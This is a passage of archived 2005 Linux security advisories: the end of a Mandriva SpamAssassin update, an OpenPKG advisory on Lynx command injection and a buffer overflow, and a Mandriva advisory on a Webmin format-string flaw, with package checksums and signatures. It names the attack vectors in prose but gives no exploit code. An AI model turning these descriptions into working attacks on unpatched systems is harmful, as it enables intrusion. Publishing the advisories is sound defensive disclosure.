x86_64/10.2/RPMS/spamassassin-spamc-3.0.4-0.2.102mdk.x86_64.rpm b8c5daaf23e58bcf8d344178a6d28b72 x86_64/10.2/RPMS/spamassassin-spamd-3.0.4-0.2.102mdk.x86_64.rpm 04bf196106dfc274c726e9be8bf293ce x86_64/10.2/RPMS/spamassassin-tools-3.0.4-0.2.102mdk.x86_64.rpm eec76ea982c797aaa1b18f6b1c35471c x86_64/10.2/SRPMS/spamassassin-3.0.4-0.2.102mdk.src.rpm Mandriva Linux 2006.0: a4f918d6bf1ca8fedc56537d17a63269 2006.0/RPMS/perl-Mail-SpamAssassin-3.0.4-3.2.20060mdk.i586.rpm 51c25677480258fb2d314bafb0f9dfa8 2006.0/RPMS/spamassassin-3.0.4-3.2.20060mdk.i586.rpm b30bf3189682f28947ede6cc32c23cfe 2006.0/RPMS/spamassassin-spamc-3.0.4-3.2.20060mdk.i586.rpm af129cafa8c0afacf47848248e2a093f 2006.0/RPMS/spamassassin-spamd-3.0.4-3.2.20060mdk.i586.rpm e5c6baedbbb98c975cfdbcfbddf50940 2006.0/RPMS/spamassassin-tools-3.0.4-3.2.20060mdk.i586.rpm 4b6ae867e1bcfc10a29fc13b04d9a1a6 2006.0/SRPMS/spamassassin-3.0.4-3.2.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: d76d8b497ef31d06b89a3ff3a6c1fbd9 x86_64/2006.0/RPMS/perl-Mail-SpamAssassin-3.0.4-3.2.20060mdk.x86_64.rpm 29b0e1af99bc43c46c3d53b4c9e1ca1d x86_64/2006.0/RPMS/spamassassin-3.0.4-3.2.20060mdk.x86_64.rpm f8239556e3a60e290a51d70ccdc3fc48 x86_64/2006.0/RPMS/spamassassin-spamc-3.0.4-3.2.20060mdk.x86_64.rpm 0f2ac7444f0878e2c6d001d8c52a6bfd x86_64/2006.0/RPMS/spamassassin-spamd-3.0.4-3.2.20060mdk.x86_64.rpm d6770761031d62efcd536f0d087a0f40 x86_64/2006.0/RPMS/spamassassin-tools-3.0.4-3.2.20060mdk.x86_64.rpm 4b6ae867e1bcfc10a29fc13b04d9a1a6 x86_64/2006.0/SRPMS/spamassassin-3.0.4-3.2.20060mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories
[OpenPKG-SA-2005.026] OpenPKG Security Advisory (lynx)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 OpenPKG Security AdvisoryThe OpenPKG Project http://www.openpkg.org/security.html http://www.openpkg.org [EMAIL PROTECTED] [EMAIL PROTECTED] OpenPKG-SA-2005.026 03-Dec-2005 Package: lynx Vulnerability: command injection OpenPKG Specific:no Affected Releases: Affected Packages: Corrected Packages: OpenPKG CURRENT <= lynx-2.8.5-20051030 >= lynx-2.8.5.5-20051203 OpenPKG 2.5 <= lynx-2.8.5-2.5.0 >= lynx-2.8.5-2.5.1 OpenPKG 2.4 <= lynx-2.8.5-2.4.0 >= lynx-2.8.5-2.4.1 OpenPKG 2.3 <= lynx-2.8.5-2.3.0 >= lynx-2.8.5-2.3.1 Description: According to a iDEFENSE security advisory [0], a command injection vulnerability exists in the Lynx [2] WWW textual client. The vulnerability could allow attackers to execute arbitrary commands with the privileges of the underlying user. The problem specifically exists within the feature to execute local "cgi-bin" programs via the "lynxcgi:" URI handler. The Common Vulnerabilities and Exposures (CVE) project assigned the id CVE-2005-2929 [3] to the problem. Additionally, according to a security advisory from Ulf Harnhammar [1], a stack-based buffer overflow in the "HTrjis" function in Lynx allows remote NNTP servers to execute arbitrary code via certain article headers containing Asian characters that cause Lynx to add extra escape (ESC) characters. The Common Vulnerabilities and Exposures (CVE) project assigned the id CVE-2005-3120 [4] to the problem. References: [0] http://www.idefense.com/application/poi/display?id=338 [1] http://lists.grok.org.uk/pipermail/full-disclosure/2005-October/038019.html [2] http://lynx.isc.org/ [3] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2929 [4] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3120 For security reasons, this advisory was digitally signed with the OpenPGP public key "OpenPKG <[EMAIL PROTECTED]>" (ID 63C4CB9F) of the OpenPKG project which you can retrieve from http://pgp.openpkg.org and hkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org/ for details on how to verify the integrity of this advisory. -BEGIN PGP SIGNATURE- Comment: OpenPKG <[EMAIL PROTECTED]> iD8DBQFDkaokgHWT4GPEy58RAnurAJ9k6+9V7BtgDG6PmJ4FXgV8+urLYQCgueUG XQSysqWKUgxnq/NW+k/BQ3A= =x+XU -END PGP SIGNATURE-
MDKSA-2005:223 - Updated webmin package fixes format string vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2005:223 http://www.mandriva.com/security/ ___ Package : webmin Date: December 2, 2005 Affected: 10.1, 10.2, 2006.0, Corporate 2.1, Corporate 3.0 ___ Problem Description: Jack Louis discovered a format string vulnerability in miniserv.pl Perl web server in Webmin before 1.250 and Usermin before 1.180, with syslog logging enabled. This can allow remote attackers to cause a denial of service (crash or memory consumption) and possibly execute arbitrary code via format string specifiers in the username parameter to the login form, which is ultimately used in a syslog call. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3912 ___ Updated Packages: Mandriva Linux 10.1: 1c75e57f72de9b9eb187d18de15d9a0b 10.1/RPMS/webmin-1.150-3.2.101mdk.noarch.rpm fb3f30131577c5e7e799ee58264055aa 10.1/SRPMS/webmin-1.150-3.2.101mdk.src.rpm Mandriva Linux 10.1/X86_64: 39782b6c2fe898596023ad384cd2d5ce x86_64/10.1/RPMS/webmin-1.150-3.2.101mdk.noarch.rpm fb3f30131577c5e7e799ee58264055aa x86_64/10.1/SRPMS/webmin-1.150-3.2.101mdk.src.rpm Mandriva Linux 10.2: 5ff784b1c60b7cc2fbc39487c22b6b78 10.2/RPMS/webmin-1.180-1.2.102mdk.noarch.rpm 060c31856652e82003997150f9403021 10.2/SRPMS/webmin-1.180-1.2.102mdk.src.rpm Mandriva Linux 10.2/X86_64: a268a1aa09cf68c7727aa7f0f479c8ac x86_64/10.2/RPMS/webmin-1.180-1.2.102mdk.noarch.rpm 060c31856652e82003997150f9403021 x86_64/10.2/SRPMS/webmin-1.180-1.2.102mdk.src.rpm Mandriva Linux 2006.0: 25b784d8c69c42f5f816272f47528156 2006.0/RPMS/webmin-1.220-9.2.20060mdk.noarch.rpm 64772a0268b55e2d2650f4c43f4fe0b2 2006.0/SRPMS/webmin-1.220-9.2.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: bab0f651f140671b4bb01f65b9799de9 x86_64/2006.0/RPMS/webmin-1.220-9.2.20060mdk.noarch.rpm 64772a0268b55e2d2650f4c43f4fe0b2 x86_64/2006.0/SRPMS/webmin-1.220-9.2.20060mdk.src.rpm Corporate Server 2.1: 303bd86b1156ea7ff6d08654fe824707 corporate/2.1/RPMS/webmin-0.990-6.6.C21mdk.noarch.rpm 0141850dc79c0ef041bd077264213dc9 corporate/2.1/SRPMS/webmin-0.990-6.6.C21mdk.src.rpm Corporate Server 2.1/X86_64: 8bb1b1dd0afea4178626fd6d8470b730 x86_64/corporate/2.1/RPMS/webmin-0.990-6.6.C21mdk.noarch.rpm 0141850dc79c0ef041bd077264213dc9 x86_64/corporate/2.1/SRPMS/webmin-0.990-6.6.C21mdk.src.rpm Corporate 3.0: 5826c5c5fea5793c594d4fa46cae6338 corporate/3.0/RPMS/webmin-1.121-4.5.C30mdk.noarch.rpm d38cdd7a15e0340ca4e5aa95e8a5b5ec corporate/3.0/SRPMS/webmin-1.121-4.5.C30mdk.src.rpm Corporate 3.0/X86_64: abd80f852fa1c5628da3613623a1f1c1 x86_64/corporate/3.0/RPMS/webmin-1.121-4.5.C30mdk.noarch.rpm d38cdd7a15e0340ca4e5aa95e8a5b5ec x86_64/corporate/3.0/SRPMS/webmin-1.121-4.5.C30mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFDkKSNmqjQ0CJFipgRAv02AJ9jK/zjwWYPUmxU+eLOPHfHcknTDgCg1wxA OjWMSwu8XOcyXiJlYfhP3eI= =fmDq -END PGP SIGNATURE-